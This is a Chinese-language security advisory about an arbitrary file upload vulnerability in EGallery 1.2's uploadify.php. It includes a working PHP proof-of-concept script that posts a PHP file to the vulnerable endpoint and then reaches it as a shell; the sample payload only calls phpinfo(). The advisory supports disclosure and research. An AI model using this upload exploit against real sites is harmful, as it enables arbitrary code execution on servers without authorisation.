发布日期:2012-07-16
更新日期:2012-07-17受影响系统:
sourceforge EGallery 1.x
描述:
--------------------------------------------------------------------------------
EGallery是自动的PHP图形库。EGallery 1.2版本egallery/uploadify.php脚本允许将任意扩展名的文件上传到webroot中的文件夹中,通过上传恶意PHP脚本,该漏洞可被利用执行任意PHP代码。<*来源:Sammy Forgit
链接:http://secunia.com/advisories/49941/
http://www.opensyscom.fr/Actualites/egallery-arbitrary-file-upload-vulnerability.html
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Sammy Forgit ()提供了如下测试方法:
PostShell.php
<?php$uploadfile="lo.php";$ch = curl_init("http://localhost/egallery/egallery/uploadify.php?folder=/egallery/egallery/");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array("Filedata"=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";?>Shell Access : http://localhost/egallery/egallery/lo.phplo.php
<?php
phpinfo();
?>建议:
--------------------------------------------------------------------------------
厂商补丁:sourceforge
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://jocr.sourceforge.net/index.htmlMetaSploit Framework "pcap_log"插件本地权限提升漏洞Yahoo! Browser for Android "WebView"类信息泄露漏洞相关资讯 任意文件上传漏洞 EGallery
- Drupal Live CSS模块任意文件上传 (01/22/2013 16:45:18)
- BigDump 跨站脚本、SQL注入、任意 (12/04/2012 06:49:45)
- sflog! <= 1.00 任意文件上传漏洞 (11/05/2012 06:51:50)
| - WordPress 多个CMSMasters主题" (12/20/2012 12:33:48)
- FCKEditor "FileUpload()"函数任意 (12/01/2012 09:28:48)
- WordPress Guest Posting插件" (10/16/2012 06:38:57)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参
|